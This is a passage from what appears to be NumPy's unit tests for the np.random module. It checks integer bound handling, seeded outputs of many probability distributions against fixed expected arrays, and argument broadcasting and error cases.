# When stored in Numpy arrays, `lbnd` is casted
# as np.int64, and `ubnd` is casted as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
# causing it be round down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1)
# None of these function calls should
# generate a ValueError now.
actual = np.random.randint(lbnd, ubnd, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is np.bool_ else np.iinfo(dt).min
ubnd = 2 if dt is np.bool_ else np.iinfo(dt).max + 1
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_equal(sample.dtype, np.dtype(dt))
for dt in (bool, int, np.long):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, dtype=dt)
assert_(not hasattr(sample, 'dtype'))
assert_equal(type(sample), dt)
class TestRandomDist(object):
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_rand(self):
np.random.seed(self.seed)
actual = np.random.rand(3, 2)
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randn(self):
np.random.seed(self.seed)
actual = np.random.randn(3, 2)
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_randint(self):
np.random.seed(self.seed)
actual = np.random.randint(-99, 99, size=(3, 2))
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers(self):
np.random.seed(self.seed)
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = np.random.random_integers(-99, 99, size=(3, 2))
assert_(len(w) == 1)
desired = np.array([[31, 3],
[-52, 41],
[-48, -66]])
assert_array_equal(actual, desired)
def test_random_integers_max_int(self):
# Tests whether random_integers can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
with suppress_warnings() as sup:
w = sup.record(DeprecationWarning)
actual = np.random.random_integers(np.iinfo('l').max,
np.iinfo('l').max)
assert_(len(w) == 1)
desired = np.iinfo('l').max
assert_equal(actual, desired)
def test_random_integers_deprecated(self):
with warnings.catch_warnings():
warnings.simplefilter("error", DeprecationWarning)
# DeprecationWarning raised with high == None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max)
# DeprecationWarning raised with high != None
assert_raises(DeprecationWarning,
np.random.random_integers,
np.iinfo('l').max, np.iinfo('l').max)
def test_random_sample(self):
np.random.seed(self.seed)
actual = np.random.random_sample((3, 2))
desired = np.array([[0.61879477158567997, 0.59162362775974664],
[0.88868358904449662, 0.89165480011560816],
[0.4575674820298663, 0.7781880808593471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_choice_uniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4)
desired = np.array([2, 3, 2, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([1, 1, 2, 2])
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False)
desired = np.array([0, 1, 3])
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
np.random.seed(self.seed)
actual = np.random.choice(4, 3, replace=False,
p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([2, 3, 1])
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
np.random.seed(self.seed)
actual = np.random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['c', 'd', 'c', 'd'])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = np.random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [[1, 2], [3, 4]], 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(np.random.choice(2, replace=True)))
assert_(np.isscalar(np.random.choice(2, replace=False)))
assert_(np.isscalar(np.random.choice(2, replace=True, p=p)))
assert_(np.isscalar(np.random.choice(2, replace=False, p=p)))
assert_(np.isscalar(np.random.choice([1, 2], replace=True)))
assert_(np.random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(np.random.choice(2, s, replace=True)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False)))
assert_(not np.isscalar(np.random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(np.random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(np.random.choice([1, 2], s, replace=True)))
assert_(np.random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(np.random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(np.random.choice(6, s, replace=True).shape, s)
assert_equal(np.random.choice(6, s, replace=False).shape, s)
assert_equal(np.random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(np.random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(np.random.choice(np.arange(6), s, replace=True).shape, s)
def test_bytes(self):
np.random.seed(self.seed)
actual = np.random.bytes(10)
desired = b'\x82Ui\x9e\xff\x97+Wf\xa5'
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, 1),
("b", np.int32, 1)])]:
np.random.seed(self.seed)
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
np.random.shuffle(alist)
actual = alist
desired = conv([0, 1, 9, 6, 2, 4, 5, 8, 7, 3])
assert_array_equal(actual, desired)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
np.random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
np.random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_beta(self):
np.random.seed(self.seed)
actual = np.random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.45341850513746058e-02, 5.31297615662868145e-04],
[1.85366619058432324e-06, 4.19214516800110563e-03],
[1.58405155108498093e-04, 1.26252891949397652e-04]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
np.random.seed(self.seed)
actual = np.random.binomial(100.123, .456, size=(3, 2))
desired = np.array([[37, 43],
[42, 48],
[46, 45]])
assert_array_equal(actual, desired)
def test_chisquare(self):
np.random.seed(self.seed)
actual = np.random.chisquare(50, size=(3, 2))
desired = np.array([[63.87858175501090585, 68.68407748911370447],
[65.77116116901505904, 47.09686762438974483],
[72.3828403199695174, 74.18408615260374006]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
np.random.seed(self.seed)
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = np.random.mtrand.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.54539444573611562, 0.45460555426388438],
[0.62345816822039413, 0.37654183177960598]],
[[0.55206000085785778, 0.44793999914214233],
[0.58964023305154301, 0.41035976694845688]],
[[0.59266909280647828, 0.40733090719352177],
[0.56974431743975207, 0.43025568256024799]]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(np.random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(np.random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, np.random.dirichlet, p, float(1))
def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, np.random.mtrand.dirichlet, alpha)
def test_exponential(self):
np.random.seed(self.seed)
actual = np.random.exponential(1.1234, size=(3, 2))
desired = np.array([[1.08342649775011624, 1.00607889924557314],
[2.46628830085216721, 2.49668106809923884],
[0.68717433461363442, 1.69175666993575979]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(np.random.exponential(scale=0), 0)
assert_raises(ValueError, np.random.exponential, scale=-0.)
def test_f(self):
np.random.seed(self.seed)
actual = np.random.f(12, 77, size=(3, 2))
desired = np.array([[1.21975394418575878, 1.75135759791559775],
[1.44803115017146489, 1.22108959480396262],
[1.02176975757740629, 1.34431827623300415]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
np.random.seed(self.seed)
actual = np.random.gamma(5, 3, size=(3, 2))
desired = np.array([[24.60509188649287182, 28.54993563207210627],
[26.13476110204064184, 12.56988482927716078],
[31.71863275789960568, 33.30143302795922011]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(np.random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, np.random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
np.random.seed(self.seed)
actual = np.random.geometric(.123456789, size=(3, 2))
desired = np.array([[8, 7],
[17, 17],
[5, 12]])
assert_array_equal(actual, desired)
def test_gumbel(self):
np.random.seed(self.seed)
actual = np.random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.19591898743416816, 0.34405539668096674],
[-1.4492522252274278, -1.47374816298446865],
[1.10651090478803416, -0.69535848626236174]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(np.random.gumbel(scale=0), 0)
assert_raises(ValueError, np.random.gumbel, scale=-0.)
def test_hypergeometric(self):
np.random.seed(self.seed)
actual = np.random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[10, 10],
[10, 10],
[9, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = np.random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = np.random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = np.random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = np.random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
np.random.seed(self.seed)
actual = np.random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[0.66599721112760157, 0.52829452552221945],
[3.12791959514407125, 3.18202813572992005],
[-0.05391065675859356, 1.74901336242837324]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(np.random.laplace(scale=0), 0)
assert_raises(ValueError, np.random.laplace, scale=-0.)
def test_logistic(self):
np.random.seed(self.seed)
actual = np.random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[1.09232835305011444, 0.8648196662399954],
[4.27818590694950185, 4.33897006346929714],
[-0.21682183359214885, 2.63373365386060332]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
np.random.seed(self.seed)
actual = np.random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[16.50698631688883822, 36.54846706092654784],
[22.67886599981281748, 0.71617561058995771],
[65.72798501792723869, 86.84341601437161273]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(np.random.lognormal(sigma=0), 1)
assert_raises(ValueError, np.random.lognormal, sigma=-0.)
def test_logseries(self):
np.random.seed(self.seed)
actual = np.random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[2, 2],
[6, 17],
[3, 6]])
assert_array_equal(actual, desired)
def test_multinomial(self):
np.random.seed(self.seed)
actual = np.random.multinomial(20, [1/6.]*6, size=(3, 2))
desired = np.array([[[4, 3, 5, 4, 2, 2],
[5, 2, 8, 2, 2, 1]],
[[3, 4, 3, 6, 0, 4],
[2, 1, 4, 3, 6, 4]],
[[4, 4, 2, 5, 2, 3],
[4, 3, 4, 2, 3, 4]]])
assert_array_equal(actual, desired)
def test_multivariate_normal(self):
np.random.seed(self.seed)
mean = (.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = np.random.multivariate_normal(mean, cov, size)
desired = np.array([[[1.463620246718631, 11.73759122771936 ],
[1.622445133300628, 9.771356667546383]],
[[2.154490787682787, 12.170324946056553],
[1.719909438201865, 9.230548443648306]],
[[0.689515026297799, 9.880729819607714],
[-0.023054015651998, 9.201096623542879]]])
assert_array_almost_equal(actual, desired, decimal=15)
# Check for default size, was raising deprecation warning
actual = np.random.multivariate_normal(mean, cov)
desired = np.array([0.895289569463708, 9.17180864067987])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that non positive-semidefinite covariance warns with
# RuntimeWarning
mean = [0, 0]
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, np.random.multivariate_normal, mean, cov)
# and that it doesn't warn with RuntimeWarning check_valid='ignore'
assert_no_warnings(np.random.multivariate_normal, mean, cov,
check_valid='ignore')
# and that it raises with RuntimeWarning check_valid='raises'
assert_raises(ValueError, np.random.multivariate_normal, mean, cov,
check_valid='raise')
def test_negative_binomial(self):
np.random.seed(self.seed)
actual = np.random.negative_binomial(n=100, p=.12345, size=(3, 2))
desired = np.array([[848, 841],
[892, 611],
[779, 647]])
assert_array_equal(actual, desired)
def test_noncentral_chisquare(self):
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array([[23.91905354498517511, 13.35324692733826346],
[31.22452661329736401, 16.60047399466177254],
[5.03461598262724586, 17.94973089023519464]])
assert_array_almost_equal(actual, desired, decimal=14)
actual = np.random.noncentral_chisquare(df=.5, nonc=.2, size=(3, 2))
desired = np.array([[1.47145377828516666, 0.15052899268012659],
[0.00943803056963588, 1.02647251615666169],
[0.332334982684171, 0.15451287602753125]])
assert_array_almost_equal(actual, desired, decimal=14)
np.random.seed(self.seed)
actual = np.random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array([[9.597154162763948, 11.725484450296079],
[10.413711048138335, 3.694475922923986],
[13.484222138963087, 14.377255424602957]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
np.random.seed(self.seed)
actual = np.random.noncentral_f(dfnum=5, dfden=2, nonc=1,
size=(3, 2))
desired = np.array([[1.40598099674926669, 0.34207973179285761],
[3.57715069265772545, 7.92632662577829805],
[0.43741599463544162, 1.1774208752428319]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
np.random.seed(self.seed)
actual = np.random.normal(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[2.80378370443726244, 3.59863924443872163],
[3.121433477601256, -0.33382987590723379],
[4.18552478636557357, 4.46410668111310471]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(np.random.normal(scale=0), 0)
assert_raises(ValueError, np.random.normal, scale=-0.)
def test_pareto(self):
np.random.seed(self.seed)
actual = np.random.pareto(a=.123456789, size=(3, 2))
desired = np.array(
[[2.46852460439034849e+03, 1.41286880810518346e+03],
[5.28287797029485181e+07, 6.57720981047328785e+07],
[1.40840323350391515e+02, 1.98390255135251704e+05]])
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# http://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
np.random.seed(self.seed)
actual = np.random.poisson(lam=.123456789, size=(3, 2))
desired = np.array([[0, 0],
[1, 0],
[0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo('l').max
lamneg = -1
assert_raises(ValueError, np.random.poisson, lamneg)
assert_raises(ValueError, np.random.poisson, [lamneg]*10)
assert_raises(ValueError, np.random.poisson, lambig)
assert_raises(ValueError, np.random.poisson, [lambig]*10)
def test_power(self):
np.random.seed(self.seed)
actual = np.random.power(a=.123456789, size=(3, 2))
desired = np.array([[0.02048932883240791, 0.01424192241128213],
[0.38446073748535298, 0.39499689943484395],
[0.00177699707563439, 0.13115505880863756]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
np.random.seed(self.seed)
actual = np.random.rayleigh(scale=10, size=(3, 2))
desired = np.array([[13.8882496494248393, 13.383318339044731],
[20.95413364294492098, 21.08285015800712614],
[11.06066537006854311, 17.35468505778271009]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(np.random.rayleigh(scale=0), 0)
assert_raises(ValueError, np.random.rayleigh, scale=-0.)
def test_standard_cauchy(self):
np.random.seed(self.seed)
actual = np.random.standard_cauchy(size=(3, 2))
desired = np.array([[0.77127660196445336, -6.55601161955910605],
[0.93582023391158309, -2.07479293013759447],
[-4.74601644297011926, 0.18338989290760804]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
np.random.seed(self.seed)
actual = np.random.standard_exponential(size=(3, 2))
desired = np.array([[0.96441739162374596, 0.89556604882105506],
[2.1953785836319808, 2.22243285392490542],
[0.6116915921431676, 1.50592546727413201]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_gamma(self):
np.random.seed(self.seed)
actual = np.random.standard_gamma(shape=3, size=(3, 2))
desired = np.array([[5.50841531318455058, 6.62953470301903103],
[5.93988484943779227, 2.31044849402133989],
[7.54838614231317084, 8.012756093271868]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gamma_0(self):
assert_equal(np.random.standard_gamma(shape=0), 0)
assert_raises(ValueError, np.random.standard_gamma, shape=-0.)
def test_standard_normal(self):
np.random.seed(self.seed)
actual = np.random.standard_normal(size=(3, 2))
desired = np.array([[1.34016345771863121, 1.73759122771936081],
[1.498988344300628, -0.2286433324536169],
[2.031033998682787, 2.17032494605655257]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_t(self):
np.random.seed(self.seed)
actual = np.random.standard_t(df=10, size=(3, 2))
desired = np.array([[0.97140611862659965, -0.08830486548450577],
[1.36311143689505321, -0.55317463909867071],
[-0.18473749069684214, 0.61181537341755321]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
np.random.seed(self.seed)
actual = np.random.triangular(left=5.12, mode=10.23, right=20.34,
size=(3, 2))
desired = np.array([[12.68117178949215784, 12.4129206149193152],
[16.20131377335158263, 16.25692138747600524],
[11.20400690911820263, 14.4978144835829923]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
np.random.seed(self.seed)
actual = np.random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array([[6.99097932346268003, 6.73801597444323974],
[9.50364421400426274, 9.53130618907631089],
[5.48995325769805476, 8.47493103280052118]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo('float').min
fmax = np.finfo('float').max
func = np.random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
np.random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, np.random.uniform, throwing_float, throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, np.random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
np.random.seed(self.seed)
actual = np.random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array([[2.28567572673902042, 2.89163838442285037],
[0.38198375564286025, 2.57638023113890746],
[1.19153771588353052, 1.83509849681825354]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
np.random.seed(self.seed)
r = np.random.vonmises(mu=0., kappa=1.1e-8, size=10**6)
np.testing.assert_(np.isfinite(r).all())
def test_wald(self):
np.random.seed(self.seed)
actual = np.random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array([[3.82935265715889983, 5.13125249184285526],
[0.35045403618358717, 1.50832396872003538],
[0.24124319895843183, 0.22031101461955038]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
np.random.seed(self.seed)
actual = np.random.weibull(a=1.23, size=(3, 2))
desired = np.array([[0.97097342648766727, 0.91422896443565516],
[1.89517770034962929, 1.91414357960479564],
[0.67057783752390987, 1.39494046635066793]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
assert_equal(np.random.weibull(a=0), 0)
assert_raises(ValueError, np.random.weibull, a=-0.)
def test_zipf(self):
np.random.seed(self.seed)
actual = np.random.zipf(a=1.23, size=(3, 2))
desired = np.array([[66, 29],
[1, 1],
[3, 13]])
assert_array_equal(actual, desired)
class TestBroadcast(object):
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def setSeed(self):
np.random.seed(self.seed)
# TODO: Include test for randint once it can broadcast
# Can steal the test written in PR #6938
def test_uniform(self):
low = [0]
high = [1]
uniform = np.random.uniform
desired = np.array([0.53283302478975902,
0.53413660089041659,
0.50955303552646702])
self.setSeed()
actual = uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
self.setSeed()
actual = uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
normal = np.random.normal
desired = np.array([2.2129019979039612,
2.1283977976520019,
1.8417114045748335])
self.setSeed()
actual = normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc * 3, bad_scale)
self.setSeed()
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
beta = np.random.beta
desired = np.array([0.19843558305989056,
0.075230336409423643,
0.24976865978980844])
self.setSeed()
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
self.setSeed()
actual = beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a, b * 3)
assert_raises(ValueError, beta, a, bad_b * 3)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
exponential = np.random.exponential
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
std_gamma = np.random.standard_gamma
desired = np.array([0.76106853658845242,
0.76386282278691653,
0.71243813125891797])
self.setSeed()
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
gamma = np.random.gamma
desired = np.array([1.5221370731769048,
1.5277256455738331,
1.4248762625178359])
self.setSeed()
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
self.setSeed()
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
f = np.random.f
desired = np.array([0.80038951638264799,
0.86768719635363512,
2.7251095168386801])
self.setSeed()
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
self.setSeed()
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
nonc_f = np.random.noncentral_f
desired = np.array([9.1393943263705211,
13.025456344595602,
8.8018098359100545])
self.setSeed()
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
self.setSeed()
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
self.setSeed()
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
self.setSeed()
desired = np.array([6.869638627492048, 0.785880199263955])
actual = np.random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
chisquare = np.random.chisquare
desired = np.array([0.57022801133088286,
0.51947702108840776,
0.1320969254923558])
self.setSeed()
actual = chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
nonc_chi = np.random.noncentral_chisquare
desired = np.array([9.0015599467913763,
4.5804135049718742,
6.0872302432834564])
self.setSeed()
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
self.setSeed()
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
t = np.random.standard_t
desired = np.array([3.0702872575217643,
5.8560725167361607,
1.0274791436474273])
self.setSeed()
actual = t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
